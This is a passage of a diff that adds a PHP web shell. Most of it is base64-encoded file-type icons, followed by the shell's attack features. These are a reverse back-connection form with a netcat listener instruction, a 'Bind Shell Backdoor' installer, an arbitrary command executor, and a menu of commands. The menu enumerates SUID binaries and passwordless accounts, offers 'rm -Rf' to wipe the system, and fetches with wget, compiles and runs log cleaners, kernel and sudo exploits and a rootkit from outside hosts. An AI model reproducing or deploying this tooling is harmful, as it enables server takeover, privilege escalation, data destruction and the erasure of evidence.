+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+echo("</center>");
+} ?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Useful Commands  
+    </div> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+        <input type=hidden name=act value="cmd"> 
+        <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+          <SELECT NAME="cmd"> 
+            <OPTION VALUE="uname -a">Kernel version 
+              <OPTION VALUE="w">Logged in users 
+                <OPTION VALUE="lastlog">Last to connect 
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports 
+                    <OPTION VALUE="locate gcc">gcc installed? 
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
+                    <OPTION VALUE="./zap2">WIPELOGS PT3 
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
+                    <OPTION VALUE="wget http://precision-gaming.com/sudo.c">wget Linux sudo stack overflow
+                    <OPTION VALUE="gcc sudo.c -o sudosploit">Compile Linux sudo sploit
+                    <OPTION VALUE="./sudosploit">Execute Sudosploit
+                    <OPTION VALUE="wget http://twofaced.org/linux2-6-all.c">Linux Kernel 2.6.* rootkit.c
+                    <OPTION VALUE="gcc linux2-6-all.c -o linuxkernel">Compile Linux2-6-all.c
+                    <OPTION VALUE="./linuxkernel">Run Linux2-6-all.c
+                    <OPTION VALUE="wget http://twofaced.org/mig-logcleaner.c">Mig LogCleaner
+                    <OPTION VALUE="gcc -DLINUX -WALL mig-logcleaner.c -o migl">Compile Mig LogCleaner
+                    <OPTION VALUE="./migl -u root 0">Compile Mig LogCleaner
